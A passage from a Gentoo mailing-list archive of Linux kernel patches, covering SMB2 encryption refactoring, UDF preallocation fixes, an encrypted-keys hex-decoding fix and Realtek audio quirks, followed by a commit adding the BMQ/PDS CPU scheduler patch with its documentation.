++	*sgl = (struct scatterlist *)PTR_ALIGN((u8 *)*req + req_size,
++					       __alignof__(struct scatterlist));
++	return p;
+ }
+ 
+-/* Assumes the first rqst has a transform header as the first iov.
+- * I.e.
+- * rqst[0].rq_iov[0]  is transform header
+- * rqst[0].rq_iov[1+] data to be encrypted/decrypted
+- * rqst[1+].rq_iov[0+] data to be encrypted/decrypted
+- */
+-static struct scatterlist *
+-init_sg(int num_rqst, struct smb_rqst *rqst, u8 *sign)
++static void *smb2_get_aead_req(struct crypto_aead *tfm, const struct smb_rqst *rqst,
++			       int num_rqst, const u8 *sig, u8 **iv,
++			       struct aead_request **req, struct scatterlist **sgl)
+ {
+-	unsigned int sg_len;
++	unsigned int off, len, skip;
+ 	struct scatterlist *sg;
+-	unsigned int i;
+-	unsigned int j;
+-	unsigned int idx = 0;
+-	int skip;
+-
+-	sg_len = 1;
+-	for (i = 0; i < num_rqst; i++)
+-		sg_len += rqst[i].rq_nvec + rqst[i].rq_npages;
++	unsigned int num_sgs;
++	unsigned long addr;
++	int i, j;
++	void *p;
+ 
+-	sg = kmalloc_array(sg_len, sizeof(struct scatterlist), GFP_KERNEL);
+-	if (!sg)
++	p = smb2_aead_req_alloc(tfm, rqst, num_rqst, sig, iv, req, sgl, &num_sgs);
++	if (!p)
+ 		return NULL;
+ 
+-	sg_init_table(sg, sg_len);
++	sg_init_table(*sgl, num_sgs);
++	sg = *sgl;
++
++	/* Assumes the first rqst has a transform header as the first iov.
++	 * I.e.
++	 * rqst[0].rq_iov[0]  is transform header
++	 * rqst[0].rq_iov[1+] data to be encrypted/decrypted
++	 * rqst[1+].rq_iov[0+] data to be encrypted/decrypted
++	 */
+ 	for (i = 0; i < num_rqst; i++) {
++		/*
++		 * The first rqst has a transform header where the
++		 * first 20 bytes are not part of the encrypted blob.
++		 */
+ 		for (j = 0; j < rqst[i].rq_nvec; j++) {
+-			/*
+-			 * The first rqst has a transform header where the
+-			 * first 20 bytes are not part of the encrypted blob
+-			 */
+-			skip = (i == 0) && (j == 0) ? 20 : 0;
+-			smb2_sg_set_buf(&sg[idx++],
+-					rqst[i].rq_iov[j].iov_base + skip,
+-					rqst[i].rq_iov[j].iov_len - skip);
+-			}
++			struct kvec *iov = &rqst[i].rq_iov[j];
+ 
++			skip = (i == 0) && (j == 0) ? 20 : 0;
++			addr = (unsigned long)iov->iov_base + skip;
++			len = iov->iov_len - skip;
++			sg = cifs_sg_set_buf(sg, (void *)addr, len);
++		}
+ 		for (j = 0; j < rqst[i].rq_npages; j++) {
+-			unsigned int len, offset;
+-
+-			rqst_page_get_length(&rqst[i], j, &len, &offset);
+-			sg_set_page(&sg[idx++], rqst[i].rq_pages[j], len, offset);
++			rqst_page_get_length(&rqst[i], j, &len, &off);
++			sg_set_page(sg++, rqst[i].rq_pages[j], len, off);
+ 		}
+ 	}
+-	smb2_sg_set_buf(&sg[idx], sign, SMB2_SIGNATURE_SIZE);
+-	return sg;
++	cifs_sg_set_buf(sg, sig, SMB2_SIGNATURE_SIZE);
++
++	return p;
+ }
+ 
+ static int
+@@ -4314,11 +4327,11 @@ crypt_message(struct TCP_Server_Info *server, int num_rqst,
+ 	u8 sign[SMB2_SIGNATURE_SIZE] = {};
+ 	u8 key[SMB3_ENC_DEC_KEY_SIZE];
+ 	struct aead_request *req;
+-	char *iv;
+-	unsigned int iv_len;
++	u8 *iv;
+ 	DECLARE_CRYPTO_WAIT(wait);
+ 	struct crypto_aead *tfm;
+ 	unsigned int crypt_len = le32_to_cpu(tr_hdr->OriginalMessageSize);
++	void *creq;
+ 
+ 	rc = smb2_get_enc_key(server, le64_to_cpu(tr_hdr->SessionId), enc, key);
+ 	if (rc) {
+@@ -4352,32 +4365,15 @@ crypt_message(struct TCP_Server_Info *server, int num_rqst,
+ 		return rc;
+ 	}
+ 
+-	req = aead_request_alloc(tfm, GFP_KERNEL);
+-	if (!req) {
+-		cifs_server_dbg(VFS, "%s: Failed to alloc aead request\n", __func__);
++	creq = smb2_get_aead_req(tfm, rqst, num_rqst, sign, &iv, &req, &sg);
++	if (unlikely(!creq))
+ 		return -ENOMEM;
+-	}
+ 
+ 	if (!enc) {
+ 		memcpy(sign, &tr_hdr->Signature, SMB2_SIGNATURE_SIZE);
+ 		crypt_len += SMB2_SIGNATURE_SIZE;
+ 	}
+ 
+-	sg = init_sg(num_rqst, rqst, sign);
+-	if (!sg) {
+-		cifs_server_dbg(VFS, "%s: Failed to init sg\n", __func__);
+-		rc = -ENOMEM;
+-		goto free_req;
+-	}
+-
+-	iv_len = crypto_aead_ivsize(tfm);
+-	iv = kzalloc(iv_len, GFP_KERNEL);
+-	if (!iv) {
+-		cifs_server_dbg(VFS, "%s: Failed to alloc iv\n", __func__);
+-		rc = -ENOMEM;
+-		goto free_sg;
+-	}
+-
+ 	if ((server->cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
+ 	    (server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+ 		memcpy(iv, (char *)tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
+@@ -4386,6 +4382,7 @@ crypt_message(struct TCP_Server_Info *server, int num_rqst,
+ 		memcpy(iv + 1, (char *)tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
+ 	}
+ 
++	aead_request_set_tfm(req, tfm);
+ 	aead_request_set_crypt(req, sg, sg, crypt_len, iv);
+ 	aead_request_set_ad(req, assoc_data_len);
+ 
+@@ -4398,11 +4395,7 @@ crypt_message(struct TCP_Server_Info *server, int num_rqst,
+ 	if (!rc && enc)
+ 		memcpy(&tr_hdr->Signature, sign, SMB2_SIGNATURE_SIZE);
+ 
+-	kfree_sensitive(iv);
+-free_sg:
+-	kfree_sensitive(sg);
+-free_req:
+-	kfree_sensitive(req);
++	kfree_sensitive(creq);
+ 	return rc;
+ }
+ 
+diff --git a/fs/udf/inode.c b/fs/udf/inode.c
+index dce6ae9ae306c..f713d108f21d3 100644
+--- a/fs/udf/inode.c
++++ b/fs/udf/inode.c
+@@ -439,6 +439,12 @@ static int udf_get_block(struct inode *inode, sector_t block,
+ 		iinfo->i_next_alloc_goal++;
+ 	}
+ 
++	/*
++	 * Block beyond EOF and prealloc extents? Just discard preallocation
++	 * as it is not useful and complicates things.
++	 */
++	if (((loff_t)block) << inode->i_blkbits > iinfo->i_lenExtents)
++		udf_discard_prealloc(inode);
+ 	udf_clear_extent_cache(inode);
+ 	phys = inode_getblk(inode, block, &err, &new);
+ 	if (!phys)
+@@ -488,8 +494,6 @@ static int udf_do_extend_file(struct inode *inode,
+ 	uint32_t add;
+ 	int count = 0, fake = !(last_ext->extLength & UDF_EXTENT_LENGTH_MASK);
+ 	struct super_block *sb = inode->i_sb;
+-	struct kernel_lb_addr prealloc_loc = {};
+-	uint32_t prealloc_len = 0;
+ 	struct udf_inode_info *iinfo;
+ 	int err;
+ 
+@@ -510,19 +514,6 @@ static int udf_do_extend_file(struct inode *inode,
+ 			~(sb->s_blocksize - 1);
+ 	}
+ 
+-	/* Last extent are just preallocated blocks? */
+-	if ((last_ext->extLength & UDF_EXTENT_FLAG_MASK) ==
+-						EXT_NOT_RECORDED_ALLOCATED) {
+-		/* Save the extent so that we can reattach it to the end */
+-		prealloc_loc = last_ext->extLocation;
+-		prealloc_len = last_ext->extLength;
+-		/* Mark the extent as a hole */
+-		last_ext->extLength = EXT_NOT_RECORDED_NOT_ALLOCATED |
+-			(last_ext->extLength & UDF_EXTENT_LENGTH_MASK);
+-		last_ext->extLocation.logicalBlockNum = 0;
+-		last_ext->extLocation.partitionReferenceNum = 0;
+-	}
+-
+ 	/* Can we merge with the previous extent? */
+ 	if ((last_ext->extLength & UDF_EXTENT_FLAG_MASK) ==
+ 					EXT_NOT_RECORDED_NOT_ALLOCATED) {
+@@ -550,7 +541,7 @@ static int udf_do_extend_file(struct inode *inode,
+ 		 * more extents, we may need to enter possible following
+ 		 * empty indirect extent.
+ 		 */
+-		if (new_block_bytes || prealloc_len)
++		if (new_block_bytes)
+ 			udf_next_aext(inode, last_pos, &tmploc, &tmplen, 0);
+ 	}
+ 
+@@ -584,17 +575,6 @@ static int udf_do_extend_file(struct inode *inode,
+ 	}
+ 
+ out:
+-	/* Do we have some preallocated blocks saved? */
+-	if (prealloc_len) {
+-		err = udf_add_aext(inode, last_pos, &prealloc_loc,
+-				   prealloc_len, 1);
+-		if (err)
+-			return err;
+-		last_ext->extLocation = prealloc_loc;
+-		last_ext->extLength = prealloc_len;
+-		count++;
+-	}
+-
+ 	/* last_pos should point to the last written extent... */
+ 	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
+ 		last_pos->offset -= sizeof(struct short_ad);
+@@ -610,13 +590,17 @@ out:
+ static void udf_do_extend_final_block(struct inode *inode,
+ 				      struct extent_position *last_pos,
+ 				      struct kernel_long_ad *last_ext,
+-				      uint32_t final_block_len)
++				      uint32_t new_elen)
+ {
+-	struct super_block *sb = inode->i_sb;
+ 	uint32_t added_bytes;
+ 
+-	added_bytes = final_block_len -
+-		      (last_ext->extLength & (sb->s_blocksize - 1));
++	/*
++	 * Extent already large enough? It may be already rounded up to block
++	 * size...
++	 */
++	if (new_elen <= (last_ext->extLength & UDF_EXTENT_LENGTH_MASK))
++		return;
++	added_bytes = (last_ext->extLength & UDF_EXTENT_LENGTH_MASK) - new_elen;
+ 	last_ext->extLength += added_bytes;
+ 	UDF_I(inode)->i_lenExtents += added_bytes;
+ 
+@@ -633,12 +617,12 @@ static int udf_extend_file(struct inode *inode, loff_t newsize)
+ 	int8_t etype;
+ 	struct super_block *sb = inode->i_sb;
+ 	sector_t first_block = newsize >> sb->s_blocksize_bits, offset;
+-	unsigned long partial_final_block;
++	loff_t new_elen;
+ 	int adsize;
+ 	struct udf_inode_info *iinfo = UDF_I(inode);
+ 	struct kernel_long_ad extent;
+ 	int err = 0;
+-	int within_final_block;
++	bool within_last_ext;
+ 
+ 	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
+ 		adsize = sizeof(struct short_ad);
+@@ -647,8 +631,17 @@ static int udf_extend_file(struct inode *inode, loff_t newsize)
+ 	else
+ 		BUG();
+ 
++	/*
++	 * When creating hole in file, just don't bother with preserving
++	 * preallocation. It likely won't be very useful anyway.
++	 */
++	udf_discard_prealloc(inode);
++
+ 	etype = inode_bmap(inode, first_block, &epos, &eloc, &elen, &offset);
+-	within_final_block = (etype != -1);
++	within_last_ext = (etype != -1);
++	/* We don't expect extents past EOF... */
++	WARN_ON_ONCE(within_last_ext &&
++		     elen > ((loff_t)offset + 1) << inode->i_blkbits);
+ 
+ 	if ((!epos.bh && epos.offset == udf_file_entry_alloc_offset(inode)) ||
+ 	    (epos.bh && epos.offset == sizeof(struct allocExtDesc))) {
+@@ -664,19 +657,17 @@ static int udf_extend_file(struct inode *inode, loff_t newsize)
+ 		extent.extLength |= etype << 30;
+ 	}
+ 
+-	partial_final_block = newsize & (sb->s_blocksize - 1);
++	new_elen = ((loff_t)offset << inode->i_blkbits) |
++					(newsize & (sb->s_blocksize - 1));
+ 
+ 	/* File has extent covering the new size (could happen when extending
+ 	 * inside a block)?
+ 	 */
+-	if (within_final_block) {
++	if (within_last_ext) {
+ 		/* Extending file within the last file block */
+-		udf_do_extend_final_block(inode, &epos, &extent,
+-					  partial_final_block);
++		udf_do_extend_final_block(inode, &epos, &extent, new_elen);
+ 	} else {
+-		loff_t add = ((loff_t)offset << sb->s_blocksize_bits) |
+-			     partial_final_block;
+-		err = udf_do_extend_file(inode, &epos, &extent, add);
++		err = udf_do_extend_file(inode, &epos, &extent, new_elen);
+ 	}
+ 
+ 	if (err < 0)
+@@ -777,10 +768,11 @@ static sector_t inode_getblk(struct inode *inode, sector_t block,
+ 		goto out_free;
+ 	}
+ 
+-	/* Are we beyond EOF? */
++	/* Are we beyond EOF and preallocated extent? */
+ 	if (etype == -1) {
+ 		int ret;
+ 		loff_t hole_len;
++
+ 		isBeyondEOF = true;
+ 		if (count) {
+ 			if (c)
+diff --git a/fs/udf/truncate.c b/fs/udf/truncate.c
+index 532cda99644ee..036ebd892b852 100644
+--- a/fs/udf/truncate.c
++++ b/fs/udf/truncate.c
+@@ -120,60 +120,42 @@ void udf_truncate_tail_extent(struct inode *inode)
+ 
+ void udf_discard_prealloc(struct inode *inode)
+ {
+-	struct extent_position epos = { NULL, 0, {0, 0} };
++	struct extent_position epos = {};
++	struct extent_position prev_epos = {};
+ 	struct kernel_lb_addr eloc;
+ 	uint32_t elen;
+ 	uint64_t lbcount = 0;
+ 	int8_t etype = -1, netype;
+-	int adsize;
+ 	struct udf_inode_info *iinfo = UDF_I(inode);
++	int bsize = 1 << inode->i_blkbits;
+ 
+ 	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB ||
+-	    inode->i_size == iinfo->i_lenExtents)
++	    ALIGN(inode->i_size, bsize) == ALIGN(iinfo->i_lenExtents, bsize))
+ 		return;
+ 
+-	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
+-		adsize = sizeof(struct short_ad);
+-	else if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_LONG)
+-		adsize = sizeof(struct long_ad);
+-	else
+-		adsize = 0;
+-
+ 	epos.block = iinfo->i_location;
+ 
+ 	/* Find the last extent in the file */
+-	while ((netype = udf_next_aext(inode, &epos, &eloc, &elen, 1)) != -1) {
+-		etype = netype;
++	while ((netype = udf_next_aext(inode, &epos, &eloc, &elen, 0)) != -1) {
++		brelse(prev_epos.bh);
++		prev_epos = epos;
++		if (prev_epos.bh)
++			get_bh(prev_epos.bh);
++
++		etype = udf_next_aext(inode, &epos, &eloc, &elen, 1);
+ 		lbcount += elen;
+ 	}
+ 	if (etype == (EXT_NOT_RECORDED_ALLOCATED >> 30)) {
+-		epos.offset -= adsize;
+ 		lbcount -= elen;
+-		extent_trunc(inode, &epos, &eloc, etype, elen, 0);
+-		if (!epos.bh) {
+-			iinfo->i_lenAlloc =
+-				epos.offset -
+-				udf_file_entry_alloc_offset(inode);
+-			mark_inode_dirty(inode);
+-		} else {
+-			struct allocExtDesc *aed =
+-				(struct allocExtDesc *)(epos.bh->b_data);
+-			aed->lengthAllocDescs =
+-				cpu_to_le32(epos.offset -
+-					    sizeof(struct allocExtDesc));
+-			if (!UDF_QUERY_FLAG(inode->i_sb, UDF_FLAG_STRICT) ||
+-			    UDF_SB(inode->i_sb)->s_udfrev >= 0x0201)
+-				udf_update_tag(epos.bh->b_data, epos.offset);
+-			else
+-				udf_update_tag(epos.bh->b_data,
+-					       sizeof(struct allocExtDesc));
+-			mark_buffer_dirty_inode(epos.bh, inode);
+-		}
++		udf_delete_aext(inode, prev_epos);
++		udf_free_blocks(inode->i_sb, inode, &eloc, 0,
++				DIV_ROUND_UP(elen, 1 << inode->i_blkbits));
+ 	}
+ 	/* This inode entry is in-memory only and thus we don't have to mark
+ 	 * the inode dirty */
+ 	iinfo->i_lenExtents = lbcount;
+ 	brelse(epos.bh);
++	brelse(prev_epos.bh);
+ }
+ 
+ static void udf_update_alloc_ext_desc(struct inode *inode,
+diff --git a/security/keys/encrypted-keys/encrypted.c b/security/keys/encrypted-keys/encrypted.c
+index e05cfc2e49aeb..1e313982af02a 100644
+--- a/security/keys/encrypted-keys/encrypted.c
++++ b/security/keys/encrypted-keys/encrypted.c
+@@ -627,7 +627,7 @@ static struct encrypted_key_payload *encrypted_key_alloc(struct key *key,
+ 			pr_err("encrypted key: instantiation of keys using provided decrypted data is disabled since CONFIG_USER_DECRYPTED_DATA is set to false\n");
+ 			return ERR_PTR(-EINVAL);
+ 		}
+-		if (strlen(decrypted_data) != decrypted_datalen) {
++		if (strlen(decrypted_data) != decrypted_datalen * 2) {
+ 			pr_err("encrypted key: decrypted data provided does not match decrypted data length provided\n");
+ 			return ERR_PTR(-EINVAL);
+ 		}
+@@ -791,8 +791,8 @@ static int encrypted_init(struct encrypted_key_payload *epayload,
+ 		ret = encrypted_key_decrypt(epayload, format, hex_encoded_iv);
+ 	} else if (decrypted_data) {
+ 		get_random_bytes(epayload->iv, ivsize);
+-		memcpy(epayload->decrypted_data, decrypted_data,
+-				   epayload->decrypted_datalen);
++		ret = hex2bin(epayload->decrypted_data, decrypted_data,
++			      epayload->decrypted_datalen);
+ 	} else {
+ 		get_random_bytes(epayload->iv, ivsize);
+ 		get_random_bytes(epayload->decrypted_data, epayload->decrypted_datalen);
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index e5c0363856664..cf7c825078dc7 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9354,6 +9354,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	 SND_PCI_QUIRK(0x103c, 0x8abb, "HP ZBook Firefly 14 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad1, "HP EliteBook 840 14 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x103f, "ASUS TX300", ALC282_FIXUP_ASUS_TX300),
+ 	SND_PCI_QUIRK(0x1043, 0x106d, "Asus K53BE", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index 4221f73a74d01..3937f66c7f8d6 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -1963,7 +1963,7 @@ static int btf_dump_struct_data(struct btf_dump *d,
+ {
+ 	const struct btf_member *m = btf_members(t);
+ 	__u16 n = btf_vlen(t);
+-	int i, err;
++	int i, err = 0;
+ 
+ 	/* note that we increment depth before calling btf_dump_print() below;
+ 	 * this is intentional.  btf_dump_data_newline() will not print a


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2022-12-16 20:25 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2022-12-16 20:25 UTC (permalink / raw
  To: gentoo-commits

commit:     c6503b1df996ec64a52b0c466eeca376b653b2aa
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Dec 16 20:24:54 2022 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Dec 16 20:24:54 2022 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=c6503b1d

Add the BMQ(BitMap Queue) Scheduler via USE=experimental

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                 |     3 +
 5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch | 10076 ++++++++++++++++++++++++++
 2 files changed, 10079 insertions(+)

diff --git a/0000_README b/0000_README
index 5e68531e..acaedd58 100644
--- a/0000_README
+++ b/0000_README
@@ -83,3 +83,6 @@ Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
 
+Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch
+From:   https://gitlab.com/alfredchen/projectc
+Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incld). Inspired by the scheduler in zircon.

diff --git a/5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch b/5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch
new file mode 100644
index 00000000..783f3bca
--- /dev/null
+++ b/5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch
@@ -0,0 +1,10076 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 42af9ca0127e..31747ec54f9d 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -5406,6 +5406,12 @@
+ 	sa1100ir	[NET]
+ 			See drivers/net/irda/sa1100_ir.c.
+ 
++	sched_timeslice=
++			[KNL] Time slice in ms for Project C BMQ/PDS scheduler.
++			Format: integer 2, 4
++			Default: 4
++			See Documentation/scheduler/sched-BMQ.txt
++
+ 	sched_verbose	[KNL] Enables verbose scheduler debug messages.
+ 
+ 	schedstats=	[KNL,X86] Enable or disable scheduled statistics.
+diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
+index 98d1b198b2b4..d7c78a107f93 100644
+--- a/Documentation/admin-guide/sysctl/kernel.rst
++++ b/Documentation/admin-guide/sysctl/kernel.rst
+@@ -1552,3 +1552,13 @@ is 10 seconds.
+ 
+ The softlockup threshold is (``2 * watchdog_thresh``). Setting this
+ tunable to zero will disable lockup detection altogether.
++
++yield_type:
++===========
++
++BMQ/PDS CPU scheduler only. This determines what type of yield calls
++to sched_yield will perform.
++
++  0 - No yield.
++  1 - Deboost and requeue task. (default)
++  2 - Set run queue skip task.
+diff --git a/Documentation/scheduler/sched-BMQ.txt b/Documentation/scheduler/sched-BMQ.txt
+new file mode 100644
+index 000000000000..05c84eec0f31
+--- /dev/null
++++ b/Documentation/scheduler/sched-BMQ.txt
+@@ -0,0 +1,110 @@
++                         BitMap queue CPU Scheduler
++                         --------------------------
++
++CONTENT
++========
++
++ Background
++ Design
++   Overview
++   Task policy
++   Priority management
++   BitMap Queue
++   CPU Assignment and Migration
++
++
++Background
++==========
++
++BitMap Queue CPU scheduler, referred to as BMQ from here on, is an evolution
++of previous Priority and Deadline based Skiplist multiple queue scheduler(PDS),
++and inspired by Zircon scheduler. The goal of it is to keep the scheduler code
++simple, while efficiency and scalable for interactive tasks, such as desktop,
++movie playback and gaming etc.
++
++Design
++======
++
++Overview
++--------
++
++BMQ use per CPU run queue design, each CPU(logical) has it's own run queue,
++each CPU is responsible for scheduling the tasks that are putting into it's
++run queue.
++
++The run queue is a set of priority queues. Note that these queues are fifo
++queue for non-rt tasks or priority queue for rt tasks in data structure. See
++BitMap Queue below for details. BMQ is optimized for non-rt tasks in the fact
++that most applications are non-rt tasks. No matter the queue is fifo or
++priority, In each queue is an ordered list of runnable tasks awaiting execution
++and the data structures are the same. When it is time for a new task to run,
++the scheduler simply looks the lowest numbered queueue that contains a task,
++and runs the first task from the head of that queue. And per CPU idle task is
++also in the run queue, so the scheduler can always find a task to run on from
++its run queue.
++
++Each task will assigned the same timeslice(default 4ms) when it is picked to
++start running. Task will be reinserted at the end of the appropriate priority
++queue when it uses its whole timeslice. When the scheduler selects a new task
++from the priority queue it sets the CPU's preemption timer for the remainder of
++the previous timeslice. When that timer fires the scheduler will stop execution
++on that task, select another task and start over again.
++
++If a task blocks waiting for a shared resource then it's taken out of its
++priority queue and is placed in a wait queue for the shared resource. When it
++is unblocked it will be reinserted in the appropriate priority queue of an
++eligible CPU.
++
++Task policy
++-----------
++
++BMQ supports DEADLINE, FIFO, RR, NORMAL, BATCH and IDLE task policy like the
++mainline CFS scheduler. But BMQ is heavy optimized for non-rt task, that's
++NORMAL/BATCH/IDLE policy tasks. Below is the implementation detail of each
++policy.
++
++DEADLINE
++	It is squashed as priority 0 FIFO task.
++
++FIFO/RR
++	All RT tasks share one single priority queue in BMQ run queue designed. The
++complexity of insert operation is O(n). BMQ is not designed for system runs
++with major rt policy tasks.
++
++NORMAL/BATCH/IDLE
++	BATCH and IDLE tasks are treated as the same policy. They compete CPU with
++NORMAL policy tasks, but they just don't boost. To control the priority of
++NORMAL/BATCH/IDLE tasks, simply use nice level.
++
++ISO
++	ISO policy is not supported in BMQ. Please use nice level -20 NORMAL policy
++task instead.
++
++Priority management
++-------------------
++
++RT tasks have priority from 0-99. For non-rt tasks, there are three different
++factors used to determine the effective priority of a task. The effective
++priority being what is used to determine which queue it will be in.
++
++The first factor is simply the task’s static priority. Which is assigned from
++task's nice level, within [-20, 19] in userland's point of view and [0, 39]
++internally.
++
++The second factor is the priority boost. This is a value bounded between
++[-MAX_PRIORITY_ADJ, MAX_PRIORITY_ADJ] used to offset the base priority, it is
++modified by the following cases:
++
++*When a thread has used up its entire timeslice, always deboost its boost by
++increasing by one.
++*When a thread gives up cpu control(voluntary or non-voluntary) to reschedule,
++and its switch-in time(time after last switch and run) below the thredhold
++based on its priority boost, will boost its boost by decreasing by one buti is
++capped at 0 (won’t go negative).
++
++The intent in this system is to ensure that interactive threads are serviced
++quickly. These are usually the threads that interact directly with the user
++and cause user-perceivable latency. These threads usually do little work and
++spend most of their time blocked awaiting another user event. So they get the
++priority boost from unblocking while background threads that do most of the
++processing receive the priority penalty for using their entire timeslice.
+diff --git a/fs/proc/base.c b/fs/proc/base.c
+index 9e479d7d202b..2a8530021b23 100644
+--- a/fs/proc/base.c
++++ b/fs/proc/base.c
+@@ -479,7 +479,7 @@ static int proc_pid_schedstat(struct seq_file *m, struct pid_namespace *ns,
+ 		seq_puts(m, "0 0 0\n");
+ 	else
+ 		seq_printf(m, "%llu %llu %lu\n",
+-		   (unsigned long long)task->se.sum_exec_runtime,
++		   (unsigned long long)tsk_seruntime(task),
+ 		   (unsigned long long)task->sched_info.run_delay,
+ 		   task->sched_info.pcount);
+ 
+diff --git a/include/asm-generic/resource.h b/include/asm-generic/resource.h
+index 8874f681b056..59eb72bf7d5f 100644
+--- a/include/asm-generic/resource.h
++++ b/include/asm-generic/resource.h
+@@ -23,7 +23,7 @@
+ 	[RLIMIT_LOCKS]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
+ 	[RLIMIT_SIGPENDING]	= { 		0,	       0 },	\
+ 	[RLIMIT_MSGQUEUE]	= {   MQ_BYTES_MAX,   MQ_BYTES_MAX },	\
+-	[RLIMIT_NICE]		= { 0, 0 },				\
++	[RLIMIT_NICE]		= { 30, 30 },				\
+ 	[RLIMIT_RTPRIO]		= { 0, 0 },				\
+ 	[RLIMIT_RTTIME]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
+ }
+diff --git a/include/linux/sched.h b/include/linux/sched.h
+index ffb6eb55cd13..2e730a59caa2 100644
+--- a/include/linux/sched.h
++++ b/include/linux/sched.h
+@@ -762,8 +762,14 @@ struct task_struct {
+ 	unsigned int			ptrace;
+ 
+ #ifdef CONFIG_SMP
+-	int				on_cpu;
+ 	struct __call_single_node	wake_entry;
++#endif
++#if defined(CONFIG_SMP) || defined(CONFIG_SCHED_ALT)
++	int				on_cpu;
++#endif
++
++#ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 	unsigned int			wakee_flips;
+ 	unsigned long			wakee_flip_decay_ts;
+ 	struct task_struct		*last_wakee;
+@@ -777,6 +783,7 @@ struct task_struct {
+ 	 */
+ 	int				recent_used_cpu;
+ 	int				wake_cpu;
++#endif /* !CONFIG_SCHED_ALT */
+ #endif
+ 	int				on_rq;
+ 
+@@ -785,6 +792,20 @@ struct task_struct {
+ 	int				normal_prio;
+ 	unsigned int			rt_priority;
+ 
++#ifdef CONFIG_SCHED_ALT
++	u64				last_ran;
++	s64				time_slice;
++	int				sq_idx;
++	struct list_head		sq_node;
++#ifdef CONFIG_SCHED_BMQ
++	int				boost_prio;
++#endif /* CONFIG_SCHED_BMQ */
++#ifdef CONFIG_SCHED_PDS
++	u64				deadline;
++#endif /* CONFIG_SCHED_PDS */
++	/* sched_clock time spent running */
++	u64				sched_time;
++#else /* !CONFIG_SCHED_ALT */
+ 	struct sched_entity		se;
+ 	struct sched_rt_entity		rt;
+ 	struct sched_dl_entity		dl;
+@@ -795,6 +816,7 @@ struct task_struct {
+ 	unsigned long			core_cookie;
+ 	unsigned int			core_occupation;
+ #endif
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_CGROUP_SCHED
+ 	struct task_group		*sched_task_group;
+@@ -1545,6 +1567,15 @@ struct task_struct {
+ 	 */
+ };
+ 
++#ifdef CONFIG_SCHED_ALT
++#define tsk_seruntime(t)		((t)->sched_time)
++/* replace the uncertian rt_timeout with 0UL */
++#define tsk_rttimeout(t)		(0UL)
++#else /* CFS */
++#define tsk_seruntime(t)	((t)->se.sum_exec_runtime)
++#define tsk_rttimeout(t)	((t)->rt.timeout)
++#endif /* !CONFIG_SCHED_ALT */
++
+ static inline struct pid *task_pid(struct task_struct *task)
+ {
+ 	return task->thread_pid;
+diff --git a/include/linux/sched/deadline.h b/include/linux/sched/deadline.h
+index 7c83d4d5a971..fa30f98cb2be 100644
+--- a/include/linux/sched/deadline.h
++++ b/include/linux/sched/deadline.h
+@@ -1,5 +1,24 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+ 
++#ifdef CONFIG_SCHED_ALT
++
++static inline int dl_task(struct task_struct *p)
++{
++	return 0;
++}
++
++#ifdef CONFIG_SCHED_BMQ
++#define __tsk_deadline(p)	(0UL)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++#define __tsk_deadline(p)	((((u64) ((p)->prio))<<56) | (p)->deadline)
++#endif
++
++#else
++
++#define __tsk_deadline(p)	((p)->dl.deadline)
++
+ /*
+  * SCHED_DEADLINE tasks has negative priorities, reflecting
